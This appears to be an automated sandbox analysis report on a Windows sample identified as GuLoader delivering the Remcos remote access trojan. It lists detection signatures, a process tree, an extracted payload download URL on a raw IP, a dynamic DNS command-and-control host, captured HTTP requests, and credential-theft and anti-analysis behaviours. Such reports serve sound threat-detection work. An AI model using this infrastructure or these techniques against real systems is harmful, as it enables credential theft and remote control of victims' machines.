Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report loKmeabs9V.exe

Overview

General Information

Sample Name:loKmeabs9V.exe
Analysis ID:457916
MD5:e0d74762f123eb6603898d1482eb9752
SHA1:ee63af5c34a027ba8b8331dd678b15e7a87d26a6
SHA256:f06e4c96e86c0f36c82d38de0627c0b81995656c4dcbc136c0fedda868ed8ea0
Tags:exeRAT
Infos:

Most interesting Screenshot:

Detection

GuLoader Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
GuLoader behavior detected
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Remcos RAT
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Creates autostart registry keys with suspicious values (likely registry only malware)
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Hides threads from debuggers
Injects a PE file into a foreign processes
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Abnormal high CPU Usage
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sleep loop found (likely to delay execution)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • loKmeabs9V.exe (PID: 1536 cmdline: 'C:\Users\user\Desktop\loKmeabs9V.exe' MD5: E0D74762F123EB6603898D1482EB9752)
    • loKmeabs9V.exe (PID: 476 cmdline: 'C:\Users\user\Desktop\loKmeabs9V.exe' MD5: E0D74762F123EB6603898D1482EB9752)
      • loKmeabs9V.exe (PID: 3576 cmdline: C:\Users\user\Desktop\loKmeabs9V.exe /stext 'C:\Users\user\AppData\Local\Temp\syqduvyml' MD5: E0D74762F123EB6603898D1482EB9752)
      • loKmeabs9V.exe (PID: 484 cmdline: C:\Users\user\Desktop\loKmeabs9V.exe /stext 'C:\Users\user\AppData\Local\Temp\cawvvojfhdxf' MD5: E0D74762F123EB6603898D1482EB9752)
      • loKmeabs9V.exe (PID: 4112 cmdline: C:\Users\user\Desktop\loKmeabs9V.exe /stext 'C:\Users\user\AppData\Local\Temp\fubgoguhvlpsyny' MD5: E0D74762F123EB6603898D1482EB9752)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "http://101.99.94.119/WEALTH_PRUuqVZw139.bin"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000E.00000002.1286073742.0000000000757000.00000004.00000020.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

      Sigma Overview

      No Sigma rule has matched

      Jbx Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Found malware configurationShow sources
      Source: 00000000.00000002.336047834.00000000022B0000.00000040.00000001.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "http://101.99.94.119/WEALTH_PRUuqVZw139.bin"}
      Multi AV Scanner detection for dropped fileShow sources
      Source: C:\Users\user\AppData\Local\Temp\subfolder1\yourphone.exeVirustotal: Detection: 20%Perma Link
      Source: C:\Users\user\AppData\Local\Temp\subfolder1\yourphone.exeReversingLabs: Detection: 13%
      Multi AV Scanner detection for submitted fileShow sources
      Source: loKmeabs9V.exeVirustotal: Detection: 20%Perma Link
      Source: loKmeabs9V.exeReversingLabs: Detection: 13%
      Yara detected Remcos RATShow sources
      Source: Yara matchFile source: 0000000E.00000002.1286073742.0000000000757000.00000004.00000020.sdmp, type: MEMORY
      Machine Learning detection for dropped fileShow sources
      Source: C:\Users\user\AppData\Local\Temp\subfolder1\yourphone.exeJoe Sandbox ML: detected
      Machine Learning detection for sampleShow sources
      Source: loKmeabs9V.exeJoe Sandbox ML: detected
      Source: 22.0.loKmeabs9V.exe.400000.0.unpackAvira: Label: TR/Patched.Ren.Gen2
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData,
      Source: loKmeabs9V.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_0040AE51 FindFirstFileW,FindNextFileW,
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 23_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 24_2_00407C87 FindFirstFileA,FindNextFileA,strlen,strlen,

      Networking:

      barindex
      C2 URLs / IPs found in malware configurationShow sources
      Source: Malware configuration extractorURLs: http://101.99.94.119/WEALTH_PRUuqVZw139.bin
      Uses dynamic DNS servicesShow sources
      Source: unknownDNS query: name: wealthyrem.ddns.net
      Source: global trafficTCP traffic: 192.168.2.3:49735 -> 194.5.97.128:39200
      Source: Joe Sandbox ViewASN Name: DANILENKODE DANILENKODE
      Source: Joe Sandbox ViewASN Name: SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY
      Source: global trafficHTTP traffic detected: GET /WEALTH_PRUuqVZw139.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 101.99.94.119Cache-Control: no-cache
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: unknownTCP traffic detected without corresponding DNS query: 101.99.94.119
      Source: global trafficHTTP traffic detected: GET /WEALTH_PRUuqVZw139.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 101.99.94.119Cache-Control: no-cache
      Source: loKmeabs9V.exe, 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
      Source: loKmeabs9V.exe, 00000016.00000003.470302046.0000000000A0D000.00000004.00000001.sdmpString found in binary or memory: ersion":"1.4.3.4"}]},"facebook-video-calling":{"group_name_matcher":"*Facebook Video*","lang":"en-US","mime_types":["application/skypesdk-plugin"],"name":"Facebook Video Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track version information for the Facebook Video Calling Plugin.","status":"requires_authorization","version":"0"}]},"google-chrome-pdf":{"group_name_matcher":"*Chrome PDF Viewer*","mime_types":[],"name":"Chrome PDF Viewer","versions":[{"comment":"Google Chrome PDF Viewer has no version informati equals www.facebook.com (Facebook)
      Source: loKmeabs9V.exe, 00000016.00000002.473429817.0000000000B3B000.00000004.00000040.sdmpString found in binary or memory: http://go.microsoft.com/fwlink/?LinkId=838604http://go.microsoft.com/fwlink/http://go.microsoft.com/fwlink/p/?LinkId=255141http://go.microsoft.com/fwlink/p/https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/loginckFilterColumnsMode equals www.facebook.com (Facebook)
      Source: loKmeabs9V.exe, 00000016.00000002.473429817.0000000000B3B000.00000004.00000040.sdmpString found in binary or memory: http://go.microsoft.com/fwlink/?LinkId=838604http://go.microsoft.com/fwlink/http://go.microsoft.com/fwlink/p/?LinkId=255141http://go.microsoft.com/fwlink/p/https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/loginckFilterColumnsMode equals www.yahoo.com (Yahoo)
      Source: loKmeabs9V.exeString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
      Source: loKmeabs9V.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
      Source: loKmeabs9V.exe, 00000016.00000003.472054856.0000000000B3A000.00000004.00000001.sdmpString found in binary or memory: s://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/https://www.google.com/chrome/https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0https://www.google.com/chrome/thank-you.htmlhttps://www.bing.com/search?q=chrome+download&src=IE-SearchBox&FORM=IESR4A&pc=EUPP_https://www.bing.com/searchhttps://go.microsoft.com/fwlink/?LinkId=838604https://go.microsoft.com/fwlink/https://go.microsoft.com/fwlink/p/?LinkId=255141https://go.microsoft.com/fwlink/p/https://go.microsoft.com/fwlink/?LinkId=517287res://C:\Windows\system32\mmcndmgr.dll/views.htmhttp://www.msn.com/?ocid=iehphttp://www.msn.com/http://www.msn.com/de-ch/?ocid=iehphttp://www.msn.com/de-ch/http://go.microsoft.com/fwlink/?LinkId=838604http://go.microsoft.com/fwlink/http://go.microsoft.com/fwlink/p/?LinkId=255141http://go.microsoft.com/fwlink/p/https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/loginckFilterColumnsMode equals www.facebook.com (Facebook)
      Source: loKmeabs9V.exe, 00000016.00000003.472054856.0000000000B3A000.00000004.00000001.sdmpString found in binary or memory: s://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/https://www.google.com/chrome/https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0https://www.google.com/chrome/thank-you.htmlhttps://www.bing.com/search?q=chrome+download&src=IE-SearchBox&FORM=IESR4A&pc=EUPP_https://www.bing.com/searchhttps://go.microsoft.com/fwlink/?LinkId=838604https://go.microsoft.com/fwlink/https://go.microsoft.com/fwlink/p/?LinkId=255141https://go.microsoft.com/fwlink/p/https://go.microsoft.com/fwlink/?LinkId=517287res://C:\Windows\system32\mmcndmgr.dll/views.htmhttp://www.msn.com/?ocid=iehphttp://www.msn.com/http://www.msn.com/de-ch/?ocid=iehphttp://www.msn.com/de-ch/http://go.microsoft.com/fwlink/?LinkId=838604http://go.microsoft.com/fwlink/http://go.microsoft.com/fwlink/p/?LinkId=255141http://go.microsoft.com/fwlink/p/https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/loginckFilterColumnsMode equals www.yahoo.com (Yahoo)
      Source: loKmeabs9V.exe, 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
      Source: loKmeabs9V.exe, 00000016.00000002.472421374.0000000000400000.00000040.00000001.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
      Source: unknownDNS traffic detected: queries for: wealthyrem.ddns.net
      Source: loKmeabs9V.exe, 00000016.00000003.470222066.0000000000A02000.00000004.00000001.sdmpString found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
      Source: loKmeabs9V.exe, 00000016.00000002.473021402.00000000006E8000.00000004.00000020.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
      Source: loKmeabs9V.exeString found in binary or memory: http://www.ebuddy.com
      Source: loKmeabs9V.exeString found in binary or memory: http://www.imvu.com
      Source: loKmeabs9V.exe, 00000017.00000002.470384906.000000000019C000.00000004.00000001.sdmpString found in binary or memory: http://www.imvu.com/.exe
      Source: loKmeabs9V.exe, 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
      Source: loKmeabs9V.exe, 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.imvu.comr
      Source: loKmeabs9V.exe, 00000016.00000002.472368637.0000000000193000.00000004.00000001.sdmpString found in binary or memory: http://www.nirsoft.net
      Source: loKmeabs9V.exe, loKmeabs9V.exe, 00000018.00000002.471540483.0000000000400000.00000040.00000001.sdmpString found in binary or memory: http://www.nirsoft.net/
      Source: loKmeabs9V.exeString found in binary or memory: https://login.yahoo.com/config/login
      Source: loKmeabs9V.exe, 00000016.00000003.471770618.0000000000A18000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
      Source: loKmeabs9V.exe, 00000016.00000003.471770618.0000000000A18000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6258784
      Source: loKmeabs9V.exeString found in binary or memory: https://www.google.com
      Source: loKmeabs9V.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
      Source: loKmeabs9V.exe, 00000016.00000002.473021402.00000000006E8000.00000004.00000020.sdmpString found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png

      Key, Mouse, Clipboard, Microphone and Screen Capturing:

      barindex
      Installs a global keyboard hookShow sources
      Source: C:\Users\user\Desktop\loKmeabs9V.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\loKmeabs9V.exe
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_0041183A OpenClipboard,GetLastError,DeleteFileW,

      E-Banking Fraud:

      barindex
      Yara detected Remcos RATShow sources
      Source: Yara matchFile source: 0000000E.00000002.1286073742.0000000000757000.00000004.00000020.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\loKmeabs9V.exeProcess Stats: CPU usage > 98%
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B629C NtWriteVirtualMemory,LoadLibraryA,
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B5971 NtAllocateVirtualMemory,
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B9189 NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B4230 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B7C19 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B5844 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B9653 NtWriteVirtualMemory,CreateProcessInternalW,
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B46C8 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B4CD0 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B9122 NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B4352 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B41B6 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B4B96 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B87E3 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 14_2_00569CF6 LdrInitializeThunk,NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 14_2_00569DCF LdrInitializeThunk,Sleep,LdrInitializeThunk,LdrInitializeThunk,NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 14_2_00569CF1 LdrInitializeThunk,NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_00401806 NtdllDefWindowProc_W,
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_004018C0 NtdllDefWindowProc_W,
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 23_2_00402CAC NtdllDefWindowProc_A,
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 23_2_00402D66 NtdllDefWindowProc_A,
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 24_2_004016FC NtdllDefWindowProc_A,
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 24_2_004017B6 NtdllDefWindowProc_A,
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B962D
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B245A
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B8687
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B629C
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B5971
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B0571
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B0BC7
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B3A2E
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B8030
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B4230
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B7C19
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B084F
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B5844
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B9653
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B1654
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B0CAC
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B30BC
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B2889
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B8098
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B3C9E
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B149C
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B2C93
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B8294
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B3EE1
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B10E0
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B46C8
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B36C3
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B82DC
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B4CD0
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B8923
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B7921
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B8324
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B151C
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B1940
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B1D5A
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B4352
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B5DAE
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B41B6
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B4B96
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B87E3
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B41E6
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B5BF3
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B19F4
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 14_3_1E99D1E7
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 14_3_1EA3B487
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 14_3_1E79FBBE
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 14_3_1E80D21E
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 14_3_1E8491EC
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 14_3_1E7AE755
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 14_3_1E7DBB8C
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 14_3_1E81BDB5
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 14_3_1E7A064D
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_0044B040
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_0043610D
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_00447310
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_0044A490
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_0040755A
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_0043C560
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_0044B610
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_0044D6C0
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_004476F0
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_0044B870
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_0044081D
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_00414957
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_004079EE
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_00407AEB
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_0044AA80
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_00412AA9
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_00404B74
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_00404B03
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_0044BBD8
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_00404BE5
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_00404C76
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_00415CFE
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_00416D72
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_00446D30
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_00446D8B
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_00406E8F
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_1_00476347
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 23_2_004050C2
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 23_2_004014AB
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 23_2_00405133
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 23_2_004051A4
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 23_2_00401246
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 23_2_0040CA46
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 23_2_00405235
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 23_2_004032C8
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 23_2_004222D9
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 23_2_00401689
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 23_2_00402F60
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 23_1_004222D9
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 24_2_0040D044
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 24_2_00405038
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 24_2_004050A9
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 24_2_0040511A
